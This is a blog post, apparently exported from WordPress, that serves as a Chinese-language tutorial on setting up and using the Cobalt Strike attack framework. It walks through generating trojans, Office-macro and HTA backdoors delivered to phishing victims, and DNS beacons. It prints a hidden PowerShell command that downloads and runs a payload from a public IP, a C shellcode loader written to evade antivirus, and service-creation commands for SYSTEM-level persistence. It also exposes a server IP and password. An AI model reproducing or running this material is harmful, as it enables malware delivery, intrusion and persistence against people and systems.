{"id":719,"date":"2025-10-24T14:24:15","date_gmt":"2025-10-24T06:24:15","guid":{"rendered":"https:\/\/www.youvii.site\/?p=719"},"modified":"2025-10-24T14:35:36","modified_gmt":"2025-10-24T06:35:36","slug":"cscobaltstrike","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/cscobaltstrike","title":{"rendered":"CS\uff08CobaltStrike\uff09"},"content":{"rendered":"

CS\uff08Cobalt Strike\uff09<\/h1>\n

\u4ecb\u7ecd<\/h1>\n

CS \u5565\u4e00\u6b3e\u57fa\u4e8e Java \u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5206\u4e3a\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\uff0c\u5ba2\u6237\u7aef\u6709\u591a\u4e2a\uff0c\u9002\u5408\u56e2\u961f\u534f\u540c\u4f5c\u6218\uff0c\u591a\u4e2a\u653b\u51fb\u8005\u53ef\u4ee5\u540c\u4e8b\u8fde\u63a5\u4e00\u4e2a\u56e2\u961f\u670d\u52a1\u5668\u5171\u4eab\u653b\u51fb\u8d44\u6e90\u4e0e\u76ee\u6807\u4fe1\u606f\u548c session\uff0c\u6a21\u62df APT \u505a\u6a21\u62df\u5bf9\u6297\uff0c\u8fdb\u884c\u5185\u7f51\u6e17\u900f<\/p>\n

CS \u96c6\u6210\u7aef\u53e3\u8f6c\u53d1\uff0c\u670d\u52a1\u626b\u63cf\uff0c\u81ea\u52a8\u5316\u6ea2\u51fa\uff0c\u591a\u6a21\u5f0f\u7aef\u53e3\u76d1\u542c\uff0cwin exe \u6728\u9a6c\u751f\u6210 win dll \u6728\u9a6c\u751f\u6210 java \u6728\u9a6c\u751f\u6210 office \u5b8f\u75c5\u6bd2\u751f\u6210 \u6728\u9a6c\u6346\u7ed1\uff0c \u9493\u9c7c\u653b\u51fb\uff08\u7ad9\u70b9\u514b\u9686\uff0c\u76ee\u6807\u4fe1\u606f\u83b7\u53d6\uff0cjava \u6267\u884c\uff0c\u6d4f\u89c8\u5668\u81ea\u52a8\u653b\u51fb\u7b49\uff09<\/p>\n

\u76ee\u5f55\u7ed3\u6784<\/h2>\n
agcscript\u62d3\u5c55\u5e94\u7528\u7684\u811a\u672c\nc2lint\u68c0\u67e5profile\u7684\u9519\u8bef\u5f02\u5e38\ncobaltstrike\ncobaltstrike.jat\u5ba2\u6237\u7aef\u7a0b\u5e8f\nicon.jpg\nlicese.pdf\nreadme.txt\nreleasenotes.txt\nteamserver\u670d\u52a1\u7aef\u7a0b\u5e8f\nupdate\nupdate.jar\nthird-party \u7b2c\u4e09\u65b9\u5de5\u5177\n  README.vncdll.txt\n  vncdll.x64.dll\n  vncdll.x86.dll<\/code><\/pre>\n
\u4e2a\u4eba\u5b9a\u5236<\/h2>\n
CS \u53ef\u4ee5\u4f7f\u7528 AggressorScripts \u811a\u672c\u52a0\u5f3a\u81ea\u8eab\uff0c\u6269\u5c55\u83dc\u5355\u680f\uff0cBeacon \u547d\u4ee4\u884c\uff0c\u63d0\u5168\u811a\u672c\u7b49<\/p>\n
CS \u901a\u4fe1\u914d\u7f6e\u6587\u4ef6\u5565 Malleable C2 \u53ef\u4ee5\u4fee\u6539 CS \u7684\u901a\u8baf\u7279\u5f81\uff0cBeaconpayload \u4e00\u4e9b\u884c\u4e3a<\/p>\n
CS \u53ef\u4ee5\u5c39\u4e1c\u5176\u4ed6\u901a\u8baf\u6846\u67b6 ExternalC2\uff0c\u5141\u8bb8\u9ed1\u5ba2\u6839\u636e\u9700\u8981\u5bf9\u6846\u67b6\u63d0\u4f9b\u9ed8\u8ba4 HTTP(S\uff09\/DNS\/SMB C2 \u901a\u4fe1\u901a\u9053\u8fdb\u884c\u6269\u5c55<\/p>\n
\u542f\u52a8\u8fd0\u884c<\/h2>\n
\u56e2\u961f\u670d\u52a1\u5668\u6700\u597d\u8fd0\u884c\u5728 Linux \u5e73\u53f0\u4e0a\uff0c\u670d\u52a1\u7aef\u5173\u952e\u6587\u4ef6\u4e0a teamserver \u548c cobalstrike.jar \u5c06\u8fd9\u4e24\u4e2a\u6587\u4ef6\u653e\u5728\u540c\u4e00\u76ee\u5f55\u4e0b\u8fd0\u884c<\/p>\n
\u6267\u884c sudo .\/teamserver<\/code><\/p>\n
\u547d\u4ee4\u8bf4\u660e<\/p>\n
.\/teamserver <host> <password> [\/path\/to\/c2.profile] [YYYY-MM-DD]\n<host> \u5fc5\u9700\u53c2\u6570 \u56e2\u961f\u670d\u52a1\u5668IP\n<password> \u5fc5\u9700\u53c2\u6570 \u8fde\u63a5\u670d\u52a1\u5668\u7684\u5bc6\u7801\n[\/path\/to\/c2.profile] \u53ef\u9009\u53c2\u6570 \u6307\u5b9aC2\u901a\u4fe1\u914d\u7f6e\u6587\u4ef6\uff0c\u4f53\u73b0\u5176\u5f3a\u5927\u7684\u6269\u5c55\u6027\n[YYYY-MM-DD] \u53ef\u9009\u53c2\u6570 \u6240\u6709payload\u7684\u7ec8\u6b62\u65f6\u95f4\n# \u542f\u52a8Team Server\n.\/teamserver 192.168.183.147 123456 # \u8bbe\u7f6e\u5f3a\u5bc6\u7801\uff0c\u5426\u5219\u5bb9\u6613\u88ab\u7206\u7834\uff0c\u53c2\u8003\u9644\u5f55<\/code><\/pre>\n
\"1746707030250-df038a43-2e93-48d8-928b-5bf19f6f370c.png\"<\/p>\n
\u5982\u679c\u6ca1\u6709\u6743\u9650\u8fd0\u884c\uff0c\u4f7f\u7528\u547d\u4ee4 sudo chmod +x teamserver \u8bbe\u7f6e\u6743\u9650\u518d\u8fd0\u884c\u5c31\u597d\u4e86  <\/p>\n
\u4f46\u662f\u4e0a\u9762\u547d\u4ee4 \u4e00\u65e6\u7a97\u53e3\u5173\u95ed\u4e86 teamserver\u5c31\u4f1a\u81ea\u52a8\u5173\u6389 \u53ef\u4ee5\u4f7f\u7528nohup \u547d\u4ee4\u8bbe\u7f6e\u540e\u53f0\u8fd0\u884c  <\/p>\n
sudo nohup .\/teamserver 192.168.0.190 123456 &<\/code><\/p>\n
\"1746707085181-bca1f8e6-b6b3-4de5-a9d6-b46a904f65d5.png\"<\/p>\n
\u9ed8\u8ba4\u7684\u76d1\u542c\u7aef\u53e3\u662f50055 \u53ef\u4ee5\u901a\u8fc7\u4fee\u6539teamserver\u91cc\u7684\u7aef\u53e3\u4fe1\u606f \u6539\u53d8\u9ed8\u8ba4\u7aef\u53e3  <\/p>\n
\"1746707093402-40d5b917-19f1-431a-83d5-71f5d8d3a9e2.png\"<\/p>\n
\u4f7f\u7528\u5ba2\u6237\u7aef\u8fde\u63a5 <\/p>\n
\"1746707101800-f95ed04e-0638-4044-8b2c-351689252bec.png\"<\/p>\n
\u5728kali\u4e0b\u6267\u884c sudo .\/cobaltstrike  <\/p>\n
\"1746707110947-a0aa9c2c-b4a3-4ab4-9394-63537651c321.png\"<\/p>\n
\u7b2c\u4e00\u6b21\u8fde\u63a5\u4f1a\u6709\u6307\u7eb9\u63d0\u793a  <\/p>\n
\"1746707119550-4095c10e-7276-4e33-996f-ade048a7091f.png\"<\/p>\n
\u6210\u529f\u8bbf\u95ee\u670d\u52a1\u7aef  <\/p>\n
\"1746707128392-aeeafe30-b070-4a69-ba76-aabe3f64b2f4.png\"<\/p>\n
\u5ba2\u6237\u7aef\u6bcf\u6b21\u8fde\u63a5\u90fd\u4f1a\u81ea\u52a8\u4fdd\u5b58\u914d\u7f6e\u6587\u4ef6\uff0c\u53ef\u4ee5\u5728\u504f\u597d\u8bbe\u7f6e\u5220\u9664\u6ca1\u7528\u7684\u8fde\u63a5\u4fe1\u606f  <\/p>\n
\"1746707148580-79e1efa6-1774-4444-a6a0-3e16ffaef1e2.png\"<\/p>\n
\u83dc\u5355\u680f\u7ffb\u8bd1<\/h2>\n
\u53c2\u6570\u8be6\u60c5  <\/p>\n
New Connection # \u65b0\u5efa\u8fde\u63a5\uff0c\u652f\u6301\u8fde\u63a5\u591a\u4e2a\u670d\u52a1\u5668\u7aef\nPreferences # \u8bbe\u7f6eCobal Strike\u754c\u9762\u3001\u63a7\u5236\u53f0\u3001\u4ee5\u53ca\u8f93\u51fa\u62a5\u544a\u6837\u5f0f\u3001TeamServer\u8fde\u63a5\u8bb0\u5f55\nVisualization # \u4e3b\u8981\u5c55\u793a\u8f93\u51fa\u7ed3\u679c\u7684\u89c6\u56fe\nVPN Interfaces # \u8bbe\u7f6eVPN\u63a5\u53e3\nListenrs # \u521b\u5efa\u76d1\u542c\u5668\nScript Manager # \u811a\u672c\u7ba1\u7406\uff0c\u53ef\u4ee5\u901a\u8fc7AggressorScripts\u811a\u672c\u6765\u52a0\u5f3a\u81ea\u8eab\uff0c\u80fd\u591f\u6269\u5c55\u83dc\u5355\u680f\uff0c\nBeacon\u547d\u4ee4\u884c\uff0c\u63d0\u6743\u811a\u672c\u7b49\nClose # \u9000\u51fa\u8fde\u63a5<\/code><\/pre>\n
New Connection # \u65b0\u5efa\u8fde\u63a5\uff0c\u652f\u6301\u8fde\u63a5\u591a\u4e2a\u670d\u52a1\u5668\u7aef\nPreferences # \u8bbe\u7f6eCobal Strike\u754c\u9762\u3001\u63a7\u5236\u53f0\u3001\u4ee5\u53ca\u8f93\u51fa\u62a5\u544a\u6837\u5f0f\u3001TeamServer\u8fde\u63a5\u8bb0\u5f55\nVisualization # \u4e3b\u8981\u5c55\u793a\u8f93\u51fa\u7ed3\u679c\u7684\u89c6\u56fe\nVPN Interfaces # \u8bbe\u7f6eVPN\u63a5\u53e3\nListenrs # \u521b\u5efa\u76d1\u542c\u5668\nScript Manager # \u811a\u672c\u7ba1\u7406\uff0c\u53ef\u4ee5\u901a\u8fc7AggressorScripts\u811a\u672c\u6765\u52a0\u5f3a\u81ea\u8eab\uff0c\u80fd\u591f\u6269\u5c55\u83dc\u5355\u680f\uff0c\nBeacon\u547d\u4ee4\u884c\uff0c\u63d0\u6743\u811a\u672c\u7b49\nClose # \u9000\u51fa\u8fde\u63a5<\/code><\/pre>\n
Attacks  <\/p>\n
HTML Application # \u751f\u6210(executable\/VBA\/powershell)\u8fd9\u4e09\u79cd\u539f\u7406\u5b9e\u73b0\u7684\u6076\u610fHTA\u6728\u9a6c\u6587\u4ef6\nMS Office Macro # \u751f\u6210office\u5b8f\u75c5\u6bd2\u6587\u4ef6\nPayload Generator # \u751f\u6210\u5404\u79cd\u8bed\u8a00\u7248\u672c\u7684payload\nUSB\/CD AutoPlay # \u751f\u6210\u5229\u7528\u81ea\u52a8\u64ad\u653e\u8fd0\u884c\u7684\u6728\u9a6c\u6587\u4ef6\nWindows Dropper # \u6346\u7ed1\u5668\u80fd\u591f\u5bf9\u4efb\u610f\u7684\u6b63\u5e38\u6587\u4ef6\u8fdb\u884c\u6346\u7ed1(\u514d\u6740\u6548\u679c\u5dee)\nWindows Executable # \u751f\u6210\u53ef\u6267\u884cexe\u6728\u9a6c\nWindows Executable(Stageless) # \u751f\u6210\u65e0\u72b6\u6001\u7684\u53ef\u6267\u884cexe\u6728\u9a6c<\/code><\/pre>\n
Manage # \u5bf9\u5f00\u542f\u7684web\u670d\u52a1\u8fdb\u884c\u7ba1\u7406\nClone Site # \u514b\u9686\u7f51\u7ad9\uff0c\u53ef\u4ee5\u8bb0\u5f55\u53d7\u5bb3\u8005\u63d0\u4ea4\u7684\u6570\u636e\nHost File # \u63d0\u4f9b\u6587\u4ef6\u4e0b\u8f7d\uff0c\u53ef\u4ee5\u9009\u62e9Mime\u7c7b\u578b\nScripted Web Delivery # \u4e3apayload\u63d0\u4f9bweb\u670d\u52a1\u4ee5\u4fbf\u4e0b\u8f7d\u548c\u6267\u884c\uff0c\u7c7b\u4f3c\u4e8eMetasploit\u7684\nweb_delivery\nSigned Applet Attack # \u4f7f\u7528java\u81ea\u7b7e\u540d\u7684\u7a0b\u5e8f\u8fdb\u884c\u9493\u9c7c\u653b\u51fb(\u8be5\u65b9\u6cd5\u5df2\u8fc7\u65f6)\nSmart Applet Attack # \u81ea\u52a8\u68c0\u6d4bjava\u7248\u672c\u5e76\u8fdb\u884c\u653b\u51fb\uff0c\u9488\u5bf9Java 1.6.0_45\u4ee5\u4e0b\u4ee5\u53caJava\n1.7.0_21\u4ee5\u4e0b\u7248\u672c(\u8be5\u65b9\u6cd5\u5df2\u8fc7\u65f6)\nSystem Profiler # \u7528\u6765\u83b7\u53d6\u7cfb\u7edf\u4fe1\u606f\uff0c\u5982\u7cfb\u7edf\u7248\u672c\uff0cFlash\u7248\u672c\uff0c\u6d4f\u89c8\u5668\u7248\u672c\u7b49\nSpear Phish # \u9c7c\u53c9\u9493\u9c7c\u90ae\u4ef6<\/code><\/pre>\n
Activity Report # \u6d3b\u52a8\u62a5\u544a\nHosts Report # \u4e3b\u673a\u62a5\u544a\nIndicators of Compromise # IOC\u62a5\u544a\uff1a\u5305\u62ecC2\u914d\u7f6e\u6587\u4ef6\u7684\u6d41\u91cf\u5206\u6790\u3001\u57df\u540d\u3001IP\u548c\u4e0a\u4f20\u6587\u4ef6\u7684MD5\nhashes\nSessions Report # \u4f1a\u8bdd\u62a5\u544a\nSocial Engineering Report # \u793e\u4f1a\u5de5\u7a0b\u62a5\u544a\uff1a\u5305\u62ec\u9c7c\u53c9\u9493\u9c7c\u90ae\u4ef6\u53ca\u70b9\u51fb\u8bb0\u5f55\nTactics, Techniques, and Procedures # \u6218\u672f\u6280\u672f\u53ca\u76f8\u5173\u7a0b\u5e8f\u62a5\u544a\uff1a\u5305\u62ec\u884c\u52a8\u5bf9\u5e94\u7684\u6bcf\u79cd\u6218\u672f\u7684\n\u68c0\u6d4b\u7b56\u7565\u548c\u7f13\u89e3\u7b56\u7565\nReset Data # \u91cd\u7f6e\u6570\u636e\nExport Data # \u5bfc\u51fa\u6570\u636e\uff0c\u5bfc\u51fa.tsv\u6587\u4ef6\u683c\u5f0f<\/code><\/pre>\n
Homepage # \u5b98\u65b9\u4e3b\u9875\nSupport # \u6280\u672f\u652f\u6301\nArsenal # \u5f00\u53d1\u8005\nSystem information # \u7248\u672c\u4fe1\u606f\nAbout # \u5173\u4e8e<\/code><\/pre>\n
\u5de5\u5177\u680f  <\/p>\n
\"1746707272562-52882053-1352-4b7e-bef4-6e25ed74b279.png\"<\/p>\n
1.\u65b0\u5efa\u8fde\u63a5\n2.\u65ad\u5f00\u5f53\u524d\u8fde\u63a5\n3.\u76d1\u542c\u5668\n4.\u6539\u53d8\u89c6\u56fe\u4e3aPivot Graph(\u89c6\u56fe\u5217\u8868)\n5.\u6539\u53d8\u89c6\u56fe\u4e3aSession Table(\u4f1a\u8bdd\u5217\u8868)\n6.\u6539\u53d8\u89c6\u56fe\u4e3aTarget Table(\u76ee\u6807\u5217\u8868)\n7.\u663e\u793a\u6240\u6709\u4ee5\u83b7\u53d6\u7684\u53d7\u5bb3\u4e3b\u673a\u7684\u51ed\u8bc1\n8.\u67e5\u770b\u5df2\u4e0b\u8f7d\u6587\u4ef6\n9.\u67e5\u770b\u952e\u76d8\u8bb0\u5f55\u7ed3\u679c\n10.\u67e5\u770b\u5c4f\u5e55\u622a\u56fe\n11.\u751f\u6210\u65e0\u72b6\u6001\u7684\u53ef\u6267\u884cexe\u6728\u9a6c\n12.\u4f7f\u7528java\u81ea\u7b7e\u540d\u7684\u7a0b\u5e8f\u8fdb\u884c\u9493\u9c7c\u653b\u51fb\n13.\u751f\u6210office\u5b8f\u75c5\u6bd2\u6587\u4ef6\n14.\u4e3apayload\u63d0\u4f9bweb\u670d\u52a1\u4ee5\u4fbf\u4e0b\u8f7d\u548c\u6267\u884c\n15.\u63d0\u4f9b\u6587\u4ef6\u4e0b\u8f7d\uff0c\u53ef\u4ee5\u9009\u62e9Mime\u7c7b\u578b\n16.\u7ba1\u7406Cobalt Strike\u4e0a\u8fd0\u884c\u7684web\u670d\u52a1\n17.\u5e2e\u52a9\n18.\u5173\u4e8e<\/code><\/pre>\n
\u57fa\u7840\u4f7f\u7528<\/h1>\n
\u5728\u8fde\u63a5\u670d\u52a1\u7aef\u540e \u9996\u5148\u521b\u5efa\u76d1\u542c\u5668 \u76d1\u542c\u5668\u7684 payload \u652f\u6301\u591a\u79cd\u534f\u8bae  <\/p>\n
\"1746707325076-73569716-35b9-4fe4-a6e5-64b0111f1ec9.png\"<\/p>\n
\u652f\u6301\u7684\u534f\u8bae  <\/p>\n
Beacon DNS\nBeacon HTTP\nBeacon HTTPS\nBeacon SMB\nBeacon TCP\nExternal C2\nForeign HTTP\nForeign HTTPS<\/code><\/pre>\n
beacon\u662fcobalt strike\u7684\u5185\u7f6e\u76d1\u542c\u5668 \u5305\u62ecdns\u3001http\u3001https\u3001smb\u56db\u79cd\u65b9\u5f0f\u7684\u76d1\u542c\u5668 foreign\u4e3a\u5916\u90e8\u76d1 \u542c\u5668\uff0c\u914d\u5408Metasploit\u6216\u8005Armitage\u7684\u76d1\u542c\u5668\u3002  <\/p>\n
\u5730\u5740\u8f6e\u56de\u7b56\u7565  <\/p>\n
\"1746707646654-0ffea875-a3e1-4d84-938b-794f1c431980.png\"<\/p>\n
http\u5730\u5740\uff08stager\uff09\u8fd9\u4e2a\u53ef\u4ee5\u586b\u5199ip\u672c\u8eab \u4e5f\u53ef\u4ee5\u586b\u5199\u591a\u4e2a\u57df\u540d \u4f46\u662f\u8fd9\u4e2a\u57df\u540d\u89e3\u6790\u5fc5\u987b\u662fteamserver\u7684\u5730 \u5740\u3002\u5728dns\u589e\u52a0\u4e86\u591a\u6761a\u8bb0\u5f55\u5747\u6307\u5411teamserver\u7684ip  <\/p>\n
\"1746755167208-6f569b78-b57a-47a1-8874-e3a76aac623f.png\"<\/p>\n
host\u662fteamserver\u7684\u5730\u5740 stager\u53ef\u4ee5\u586b\u5199\u591a\u4e2a\u57df\u540d \u53ef\u4ee5\u4f7f\u7528\u968f\u673a \u63d0\u4f9b\u591a\u4e2a\u57df\u540d\u8bbf\u95eeteamserver  <\/p>\n
\"1746755176625-7bb9ac82-d445-410d-acd4-6060c26a355d.png\"<\/p>\n
\"1746755181901-9ea44f8c-71aa-48f2-9404-df384476b7aa.png\"<\/p>\n
\u4f7f\u7528 \u653b\u51fb ->\u751f\u6210\u540e\u95e8->windows\u53ef\u6267\u884c\u7a0b\u5e8f \u9009\u62e9\u597d\u76d1\u542c\u5668 \u751f\u6210\u540e\u95e8  <\/p>\n
\"1746755191630-334790ea-9ddc-4f62-8f7c-1b55f4b31a23.png\"<\/p>\n
\u76f4\u63a5\u8fd0\u884c\u540e\u95e8 cobalt stike \u4e0a\u7ebf  <\/p>\n
\"1746755199543-37b1a569-c0cb-4f26-864d-c0378f73c2ed.png\"<\/p>\n
\u6293\u5305\u5206\u6790  <\/p>\n
\"1746755221814-575e1031-562a-43eb-855c-916ed2aad037.png\"<\/p>\n
\u540e\u95e8\u8bbf\u95ee c1.redtam.club:8899 \u5373\u53ef teamserver 10.10.10.141:8899  <\/p>\n
cobalt strike dns \u4e0a\u7ebf<\/h1>\n
\u5982\u679c\u5728\u5185\u7f51\u7528 \u9632\u706b\u5899\u53ea\u5141\u8bb8 dns \u51fa\u7f51\uff0c\u53ef\u4ee5\u4f7f\u7528 dns \u540e\u95e8\u4e0a\u7ebf\uff0c\u5728 cs \u91cc\u9762\u5185\u7f6e \u4e86\u4e00\u4e2a dns \u4e0a\u7ebf\u6a21\u5757<\/p>\n
nslookup www.baidu.com \u67e5\u8be2dns\u53d1\u73b0\u53ef\u4ee5\u51fa\u7f51  <\/p>\n
\"1746755254045-e1bb986d-48df-41e1-8132-84c940a98ca1.png\"<\/p>\n
\u51c6\u5907\u57df\u540d\u57df\u540d \u8bbe\u7f6e ns\u8bb0\u5f55 \u548ca\u8bb0\u5f55 \u5e76\u4e14\u628ans\u8bb0\u5f55\u6307\u5411a\u8bb0\u5f55  <\/p>\n
\"1746755262897-e1896ad3-ef00-4d37-915e-298cb520d5a4.png\"<\/p>\n
\u5728\u516c\u7f51\u7684vps\u91cc \u542f\u52a8\u670d\u52a1\u5668\u7aef \u5e76\u4e14\u653e\u5728\u540e\u7aef\u6267\u884c  <\/p>\n
nohup .\/teamserver 45.114.125.131 QWEasd55aa &<\/code><\/pre>\n
\u5efa\u7acbdns\u76d1\u542c\u5668  <\/p>\n
\"1746755279160-8925f891-45cc-4207-8252-466e09cf71ba.png\"<\/p>\n
\u56e0\u4e3adns\u7684\u9ed8\u8ba4\u7aef\u53e3\u662f53\u7aef\u53e3 \u5728ubuntu\u768453\u7aef\u53e3\u9ed8\u8ba4\u662f\u5f00\u542f\u7684\uff0c\u5982\u679c\u51fa\u73b0\u5360\u7528\u60c5\u51b5 \u5148\u628a53\u7aef\u53e3\u5173\u95ed Linux systemd-resolve\u5360\u752853\u7aef\u53e3\u7684\u89e3\u51b3\u65b9\u6cd5 <\/p>\n
https:\/\/blog.csdn.net\/qq_24924187\/article\/details\/109197505<\/a><\/p>\n
systemctl stop systemd-resolved<\/code><\/pre>\n
\u4f7f\u7528web\u4f20\u9012  <\/p>\n
powershell.exe -nop -w hidden -c \"IEX ((new-object\nnet.webclient).downloadstring('http:\/\/45.114.125.131:80\/dns'))\"<\/code><\/pre>\n
\u4e0a\u7ebf\u662f\u4e00\u4e2a\u9ed1\u8272\u7684\u56fe\u6807\u4f7f\u7528\u547d\u4ee4 checkin \u5f3a\u5236\u76ee\u6807\u56de\u8fde\u5e76\u66f4\u65b0\u72b6\u6001\uff08\u7528\u4e8eDNS\u4e0a\u7ebf\uff0cDNS\u6a21\u5f0f\u4e0b\u65e0\u65b0\u4efb\u52a1\u65f6\u76ee\u6807\u4e0d\u4f1a\u56de\u8fdeTeamserver\uff09 \u5728beacon\u652f\u6301\u4e09\u79cddns\u6267\u884c\u547d\u4ee4\u65b9\u5f0f \u4e00\u822c\u4f7f\u7528dns-txt\u8f83\u591a  <\/p>\n
\n
mode dns \u4f7f\u7528DNS A\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09 mode <\/p>\n
dns-txt \u4f7f\u7528DNS TXT\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09 mode<\/p>\n
dns6 \u4f7f\u7528DNS AAAA\u8bb0\u5f55\u4f5c\u4e3a\u6570\u636e\u901a\u9053\uff08\u4ec5\u652f\u6301DNS\u4e0a\u7ebfBeacon\uff09  <\/p>\n<\/blockquote>\n
\"1746755346716-5ab8c52c-1e69-4d7c-a1af-6a9f0ac466de.png\"<\/p>\n
\u751f\u6210\u540e\u95e8\u6a21\u5757\u4f7f\u7528<\/h1>\n
\u751f\u6210\u540e\u95e8\u754c\u9762\u91cc \u6709\u51e0\u4e2a\u6a21\u5757  <\/p>\n
\"1746755360143-996b7510-fd7f-46fc-80a5-80cbc9973cdc.png\"<\/p>\n
hta\u6587\u6863   \u540e\u95e8<\/h2>\n
\u8fd9\u91cc\u4ed6\u7ed9\u6211\u4eec\u63d0\u4f9b\u4e863\u79cd\u751f\u6210\u65b9\u5f0f exe,powershell,vba\u3002\u5176\u4e2dVBA\u65b9\u6cd5\u9700\u8981\u76ee\u6807\u7cfb\u7edf\u4e0a\u7684Microsoft Office\uff0c\u5728\u7cfb\u7edf\u652f\u6301\u7684\u60c5\u51b5\u4e0b\u6211\u4eec\u4e00\u822c\u9009\u62e9powershell\uff0c\u56e0\u4e3a\u8fd9\u79cd\u65b9\u5f0f\u66f4\u52a0\u5bb9\u6613\u514d\u6740\u3002\u901a\u5e38\u6211\u4eec\u7ed3\u5408 host File(\u6587\u4ef6\u4e0b\u8f7d\u529f\u80fd) \u6765\u5b9e\u884c\u9493\u9c7c\u3002  <\/p>\n
\"1746755386999-343332cc-23cc-4c16-8e62-cfb23a73cc4e.png\"<\/p>\n
hta\u6587\u4ef6\u91cc\u9762\u6267\u884cpowershell\u4ee3\u7801\u8fd0\u884c\u540e\u95e8  <\/p>\n
\"1746755396173-d7ceebe8-82cf-4a20-b0f4-09b9bd73f042.png\"<\/p>\n
\u628ahta\u6587\u4ef6\u914d\u5408\u7f51\u7ad9\u914d\u5408\u4f7f\u7528  <\/p>\n
\"1746755402870-01de55f3-b982-426f-bed4-c08c3447cd68.png\"<\/p>\n
\"1746755408890-27986524-5071-480b-b7fa-b1b55fe146cd.png\"<\/p>\n
\u8bbe\u7f6e\u597d\u540e\uff0c\u5f53\u522b\u4eba\u8bbf\u95ee\u8fd9\u4e2a\u7f51\u5740\u7684\u65f6\u5019 \u63d0\u793a\u4e0b\u8f7d \u53d7\u5bb3\u8005\u4e0b\u8f7d\u8fd0\u884c\u65f6\uff0c\u5c31\u4f1a\u4e0a\u7ebf  <\/p>\n
\"1746755418865-4d44611a-473b-494f-b2ca-c44268c9a6ba.png\"<\/p>\n
office\u5b8f<\/h1>\n
office\u5b8f \u5c06\u751f\u6210\u7684\u5b8f\u6587\u4ef6 \u653e\u5728word\u6587\u6863\uff0c\u5f53\u6587\u6863\u53ef\u4ee5\u4f7f\u7528\u5b8f\u65f6\uff0c\u81ea\u52a8\u4f1a\u8fd0\u884c\u3002 <\/p>\n
\"1746755433714-142ec1fa-06ab-40b9-8bc8-4c4ccf81dac4.png\"<\/p>\n
\"1746755436830-5d7bdaa3-8926-4de3-b4d6-597d2d71fb77.png\"<\/p>\n
\"1746755441981-07fb9005-5e25-4ec1-90de-4c530dd97504.png\"<\/p>\n
\u8f93\u5165\u5b8f  <\/p>\n
\"1746755449303-d06789e7-6583-4a08-b36f-3ab66a9fbe1e.png\"<\/p>\n
\u9009\u62e9\u5426 \u4fdd\u5b58\u4e3adotm  <\/p>\n
\u6253\u5f00\u5e26\u6709\u5b8f\u7684\u6587\u4ef6 \u81ea\u52a8\u4e0a\u7ebf  <\/p>\n
\"1746755480350-cd28d5ff-d1bb-4282-80ef-d5714b2022e8.png\"<\/p>\n
payload\u751f\u6210\u5668<\/h1>\n
cs\u91cc \u63d0\u4f9b\u4e00\u4e2apayload\u751f\u6210\u5668\uff0c\u56e0\u4e3a\u9ed8\u8ba4\u7684shellcode\u5bb9\u6613\u88ab\u6740\u6bd2\u8f6f\u4ef6\u53d1\u73b0\uff0c\u53ef\u4ee5\u7f16\u5199shellcode\u52a0\u8f7d\u5668 \u8fd0\u884cpayload \u8fbe\u5230\u514d\u6740\u7684\u6548\u679c  <\/p>\n
\"1746755492180-66a72dc5-9f0b-437e-9086-ac51e8e2175a.png\"<\/p>\n
c\/c++\u52a0\u8f7d\u5668 \u4f7f\u7528vs2019\u7f16\u8bd1  <\/p>\n
#include <windows.h>\n#include <stdio.h>\n#pragma comment(linker,\"\/subsystem:\"windows\" \/entry:\"mainCRTStartup\"\")\/\/\u4e0d\u663e\u793a\n\u7a97\u53e3\nunsigned char shellcode[] = \"xfc..\";;\nvoid main()\n{\nLPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT |\nMEM_RESERVE, PAGE_EXECUTE_READWRITE);\nif (Memory == NULL) { return; }\nmemcpy(Memory, shellcode, sizeof(shellcode));\n((void(*)())Memory)();\n}<\/code><\/pre>\n
\u7f16\u8bd1\u8bb0\u5f97\u4f7f\u7528Release\u6a21\u5f0f\u800c\u4e0d\u662fDebug \u751f\u6210 \u5426\u5219\u56de\u51fa\u73b0\u9519\u8bef<\/p>\n
windows\u53ef\u6267\u884c\u7a0b\u5e8f \u63d0\u4f9b\u4e09\u79cd\u751f\u6210\u7c7b\u578b<\/p>\n
windwos\u53ef\u6267\u884c\u7a0b\u5e8f \u76f4\u63a5\u53cc\u51fb\u8fd0\u884c <\/p>\n
windwos\u670d\u52a1\u7a0b\u5e8f \u53ef\u4ee5\u4f7f\u7528sc\u547d\u4ee4\u505a\u6210\u670d\u52a1\u7a0b\u5e8f  <\/p>\n
shell sc create \"server1\" binpath= \"C:WINDOWSTempserver1.exe\"\nshell sc description \"server1\" \"description\"\nshell sc config \"server1\" start= auto\nshell net start \"server1\"<\/code><\/pre>\n
\"1746755530374-3027a290-a6b7-4e4d-a345-2d301eafc8b8.png\"<\/p>\n
\u6267\u884c\u4e4b\u540e \u662fsystem\u6743\u9650\uff0c\u8fd9\u79cd\u65b9\u6cd5cs\u7559\u540e\u95e8\u7684\u4e00\u79cd\u65b9\u6cd5  <\/p>\n
windows dll\u6587\u4ef6 <\/p>\n
\u5728windows\u7684system\u6587\u4ef6\u5939\u4e0b\u6709\u4e00\u4e2aregsvr32.exe\u7684\u7a0b\u5e8f\uff0c\u5b83\u5c31\u662fwindows\u81ea\u5e26\u7684activex\u6ce8\u518c\u548c\u53cd\u6ce8 \u518c\u5de5\u5177\u3002(activex\u4e0d\u6ce8\u518c\u662f\u4e0d\u80fd\u591f\u88ab\u7cfb\u7edf\u8bc6\u522b\u548c\u4f7f\u7528\u7684\uff0c\u4e00\u822c\u5b89\u88c5\u7a0b\u5e8f\u90fd\u4f1a\u81ea\u52a8\u5730\u628a\u5b83\u6240\u4f7f\u7528\u7684activex \u63a7\u4ef6\u6ce8\u518c)\u3002Regsvr32\u547d\u4ee4\u7528\u4e8e\u6ce8\u518cCOM\u7ec4\u4ef6\uff0c\u662f Windows \u7cfb\u7edf\u63d0\u4f9b\u7684\u7528\u6765\u5411\u7cfb\u7edf\u6ce8\u518c\u63a7\u4ef6\u6216\u8005\u5378\u8f7d \u63a7\u4ef6\u7684\u547d\u4ee4\uff0c\u4ee5\u547d\u4ee4\u884c\u65b9\u5f0f\u8fd0\u884c  <\/p>\n
regsvr32  <\/p>\n
